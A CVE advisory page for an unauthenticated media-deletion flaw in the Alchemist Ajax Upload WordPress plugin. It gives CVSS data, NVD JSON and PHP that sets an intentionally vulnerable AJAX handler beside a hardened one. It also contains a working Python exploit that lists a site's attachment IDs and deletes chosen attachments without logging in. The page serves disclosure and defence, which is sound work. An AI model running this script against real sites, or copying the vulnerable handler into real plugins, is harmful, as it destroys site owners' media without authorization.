Security Vulnerability Report
CVE-2025-14629 CVSS 5.3 MEDIUM

CVE-2025-14629

Published: 2026-01-24 08:16:06
Last Modified: 2026-04-15 00:35:42

Description

The Alchemist Ajax Upload plugin for WordPress is vulnerable to unauthorized media file deletion due to a missing capability check on the 'delete_file' function in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to delete arbitrary WordPress media attachments.
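The weakness class here is CWE-862 (missing authorization): an admin-ajax.php handler that deletes an attachment is reachable without a session and never asks whether the caller is allowed to delete anything. Note that the record lists no patched version and the affected-products configuration is empty, so treat every installed version as affected until the plugin source at the referenced line is checked. The following is an added illustration written for this page, not code from the Alchemist Ajax Upload plugin: a minimal handler of the shape the description refers to, in its vulnerable form beside a hardened one. The hook and function names (`alch_delete_file`, `alch_delete_file_vuln`, `alch_delete_file_fixed`), the nonce action string and the `file_id` POST parameter are assumptions; the CVE record only names a `delete_file` function.

```php
<?php
// Added example for this page; not code from the Alchemist Ajax Upload plugin.
// Hook names, function names, the nonce action and the 'file_id' parameter are assumptions.

// --- Vulnerable shape (CWE-862, missing authorization) ---
// Registering on wp_ajax_nopriv_* exposes the handler to visitors with no session,
// and the handler never asks whether the caller may delete the attachment.
add_action( 'wp_ajax_alch_delete_file',        'alch_delete_file_vuln' );
add_action( 'wp_ajax_nopriv_alch_delete_file', 'alch_delete_file_vuln' );

function alch_delete_file_vuln() {
    $id = isset( $_POST['file_id'] ) ? absint( $_POST['file_id'] ) : 0;
    // Whatever attachment ID anyone supplies is deleted, file on disk included.
    wp_delete_attachment( $id, true );
    wp_send_json_success( array( 'deleted' => $id ) );
}

// --- Hardened shape ---
// 1. Logged-in hook only: for an anonymous caller admin-ajax.php finds no
//    wp_ajax_nopriv_* handler and answers with its default '0' reply.
// 2. A nonce bound to this action protects the logged-in path against CSRF.
// 3. A capability check scoped to the specific post: 'delete_post' on an
//    attachment maps through map_meta_cap() to delete_posts / delete_others_posts,
//    so a user can only remove media they own unless they hold the broader capability.
add_action( 'wp_ajax_alch_delete_file', 'alch_delete_file_fixed' );

function alch_delete_file_fixed() {
    // Dies with -1 (HTTP 403) when the 'nonce' field is missing or invalid.
    check_ajax_referer( 'alch_delete_file', 'nonce' );

    $id = isset( $_POST['file_id'] ) ? absint( $_POST['file_id'] ) : 0;

    // Refuse anything that is not an existing attachment so the handler cannot be
    // pointed at other post types.
    if ( ! $id || 'attachment' !== get_post_type( $id ) ) {
        wp_send_json_error( 'not an attachment', 400 );
    }

    // The authorization check the vulnerable form lacks.
    if ( ! current_user_can( 'delete_post', $id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // wp_delete_attachment() returns the deleted WP_Post, or false/null on failure.
    $result = wp_delete_attachment( $id, true );
    if ( ! $result ) {
        wp_send_json_error( 'delete failed', 500 );
    }
    wp_send_json_success( array( 'deleted' => $id ) );
}

// Client side: the nonce must be minted for the same action string and posted as 'nonce'.
// e.g. wp_localize_script( 'alch-js', 'alchAjax', array(
//          'url'   => admin_url( 'admin-ajax.php' ),
//          'nonce' => wp_create_nonce( 'alch_delete_file' ),
//      ) );
```

When reviewing a plugin for this class of bug, the two things to look for are a `wp_ajax_nopriv_` registration on an action that changes state, and a handler body with no `current_user_can()` (or equivalent) before the destructive call; a nonce alone is not authorization, since any logged-in user can obtain one.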

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Alchemist Ajax Upload plugin <= 1.1 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-14629 PoC - Unauthenticated Arbitrary File Deletion
# Target: WordPress Alchemist Ajax Upload Plugin <= 1.1
#
# Note: the AJAX action name and the 'file_id' parameter below are the ones this
# page's PoC uses; the CVE record itself only names a 'delete_file' function and
# points at alchemist_ajax_upload.php line 231. Confirm both against the plugin
# source before relying on them. admin-ajax.php replies with a body of '0' when
# no handler is registered for the requested action.


def delete_media_attachment(target_url, attachment_id):
    """
    Delete an arbitrary WordPress media attachment without authentication.

    Args:
        target_url: Base URL of the WordPress site
        attachment_id: ID of the media attachment to delete

    Returns:
        Response from the server, or None if the request failed
    """
    ajax_endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"

    # Construct the deletion request
    data = {
        'action': 'alchemist_delete_file',  # Plugin's AJAX action (see note above)
        'file_id': str(attachment_id),      # Attachment ID to delete
    }

    try:
        # Send the POST without any cookie or nonce: the handler is reachable
        # through wp_ajax_nopriv_* and performs no capability check.
        response = requests.post(ajax_endpoint, data=data, timeout=10)
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


def enumerate_attachments(target_url):
    """
    Enumerate available media attachments via the public REST API.

    Args:
        target_url: Base URL of the WordPress site

    Returns:
        List of (id, source_url, title) tuples; empty if the endpoint is
        unreachable, disabled, or returns unexpected data
    """
    rest_endpoint = f"{target_url.rstrip('/')}/wp-json/wp/v2/media?per_page=100"
    try:
        response = requests.get(rest_endpoint, timeout=10)
        if response.status_code == 200:
            attachments = response.json()
            return [(att['id'], att['source_url'], att['title']['rendered'])
                    for att in attachments]
    except (requests.exceptions.RequestException, ValueError, KeyError, TypeError):
        pass
    return []


def main():
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-14629.py <target_url> <attachment_id|enumerate>")
        print("Example: python cve-2025-14629.py http://example.com 123")
        print("Example: python cve-2025-14629.py http://example.com enumerate")
        sys.exit(1)

    target = sys.argv[1]
    attachment_id = sys.argv[2]

    print("[*] CVE-2025-14629 - Alchemist Ajax Upload Unauth File Deletion")
    print(f"[*] Target: {target}")
    print(f"[*] Attachment ID to delete: {attachment_id}")

    # 'enumerate' as the second argument lists attachment IDs instead of deleting
    if attachment_id == 'enumerate':
        print("\n[*] Enumerating media attachments...")
        attachments = enumerate_attachments(target)
        if attachments:
            print(f"[+] Found {len(attachments)} attachments:")
            for att_id, url, title in attachments:
                print(f"    - ID: {att_id}, Title: {title}, URL: {url}")
        else:
            print("[-] No attachments found or enumeration failed")
        return

    # Attempt to delete the specified attachment
    print(f"\n[*] Attempting to delete attachment {attachment_id}...")
    response = delete_media_attachment(target, attachment_id)

    if response:
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text[:500]}")
        # A 200 only means admin-ajax.php ran; a body of '0' means no handler
        # matched the action name. To confirm the attachment is really gone,
        # request /wp-json/wp/v2/media/<id> afterwards and expect a 404.
        if response.status_code == 200 and response.text.strip() != '0':
            print("[+] Deletion request accepted")
        else:
            print("[-] Unexpected response")


if __name__ == "__main__":
    main()

References

https://plugins.trac.wordpress.org/browser/alchemist-ajax-upload/tags/1.1/alchemist_ajax_upload.php#L231
https://plugins.trac.wordpress.org/browser/alchemist-ajax-upload/trunk/alchemist_ajax_upload.php#L231
https://wordpress.org/plugins/alchemist-ajax-upload/
https://www.wordfence.com/threat-intel/vulnerabilities/id/865dbcf5-7990-40f3-bb90-3ae359b52c6f?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14629",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-24T08:16:05.713",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Alchemist Ajax Upload plugin for WordPress is vulnerable to unauthorized media file deletion due to a missing capability check on the 'delete_file' function in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to delete arbitrary WordPress media attachments."
      },
      {
        "lang": "es",
        "value": "El plugin Alchemist Ajax Upload para WordPress es vulnerable a la eliminación no autorizada de archivos multimedia debido a una comprobación de capacidad faltante en la función 'delete_file' en todas las versiones hasta la 1.1, inclusive. Esto hace posible que atacantes no autenticados eliminen archivos adjuntos multimedia arbitrarios de WordPress."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/alchemist-ajax-upload/tags/1.1/alchemist_ajax_upload.php#L231",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/alchemist-ajax-upload/trunk/alchemist_ajax_upload.php#L231",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/alchemist-ajax-upload/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/865dbcf5-7990-40f3-bb90-3ae359b52c6f?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}